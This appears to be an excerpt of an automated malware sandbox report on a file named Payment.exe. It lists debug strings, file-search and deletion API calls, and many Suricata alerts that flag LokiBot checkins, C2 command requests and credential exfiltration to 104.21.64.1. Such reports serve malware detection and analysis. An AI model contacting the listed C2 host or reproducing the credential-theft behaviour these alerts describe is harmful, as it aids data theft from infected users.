Source:	Binary string: wntdll.pdb source: Payment.exe, 00000000.00000003.1749712815.0000000004120000.00000004.00001000.00020000.00000000.sdmp, Payment.exe, 00000000.00000003.1749004830.0000000004210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2981411012.0000000000C61000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.2981411012.0000000000C61000.00000020.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0087445A
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087C6D1 FindFirstFileW,FindClose,	0_2_0087C6D1
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0087C75C
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0087EF95
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0087F0F2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0087F3F3
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_008737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_008737EF
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00873B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00873B12
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0087BCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	1_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49748 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49817 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49731 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49748 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49745 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49731 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49745 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49745 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49731 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49748 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49775 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49745 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49732 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49775 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49732 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49732 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49748 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49733 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49775 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49732 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49787 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49787 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49734 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49876 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49775 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49735 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49876 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49817 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49863 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49863 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49876 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49863 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49734 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49787 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49863 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49876 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49940 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49940 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49734 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49940 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49787 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49940 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49734 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49750 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49817 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49863
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49748
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49826 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49817 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49826 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49826 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49826 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49952 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49762
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49952 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49754
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49952 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49775
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49852 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49952 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49993 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49993 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49993 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49852 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49852 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49993 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49852 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49753
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49817
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49737 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49734
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49852
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49750
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50044 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50044 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50044 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49801 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49801 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49993
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50059 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50059 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50059 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49801 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50044 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50053 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50053 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50059 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50053 -> 104.21.64.1:80
